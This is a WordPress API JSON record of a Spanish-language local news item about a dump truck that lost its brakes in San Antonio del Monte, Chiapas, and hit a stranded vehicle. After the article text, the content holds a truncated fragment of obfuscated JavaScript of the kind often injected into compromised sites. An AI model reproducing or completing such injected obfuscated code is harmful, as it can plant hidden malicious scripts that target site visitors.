{"id":24137,"date":"2025-09-23T03:54:28","date_gmt":"2025-09-23T03:54:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24137"},"modified":"2025-09-23T03:54:28","modified_gmt":"2025-09-23T03:54:28","slug":"camion-volteo-se-queda-sin-frenos-en-san-antonio-del-monte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24137","title":{"rendered":"Cami\u00f3n volteo se queda sin frenos en San Antonio del Monte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000347141-768x1024.jpg\" alt=\"\" class=\"wp-image-24138\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000347141-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000347141-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000347141.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>22 de septiembre del 2025. San Crist\u00f3bal de Las Casas.- Un cami\u00f3n volteo sufri\u00f3 una falla mec\u00e1nica cuando, al parecer, se qued\u00f3 sin frenos en una pendiente de la comunidad San Antonio del Monte. La pesada unidad termin\u00f3 impactando contra un veh\u00edculo que se encontraba varado en el lugar.<\/p>\n\n\n\n<p>El accidente dej\u00f3 como saldo \u00fanicamente lesiones leves para el chofer y cuantiosos da\u00f1os materiales. Tanto el conductor como los afectados decidieron arreglar la situaci\u00f3n entre particulares, sin que fuera necesaria la intervenci\u00f3n de las autoridades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal 22 de septiembre del 2025. San Crist\u00f3bal de Las Casas.- Un cami\u00f3n volteo sufri\u00f3 una falla mec\u00e1nica cuando, al parecer, se qued\u00f3 sin frenos en una pendiente de la comunidad San Antonio del Monte. La pesada unidad termin\u00f3 impactando contra un veh\u00edculo que se encontraba varado en el lugar. El accidente dej\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24138,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-24137","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24137","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24137"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24137\/revisions"}],"predecessor-version":[{"id":24139,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24137\/revisions\/24139"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24138"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24137"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24137"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24137"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}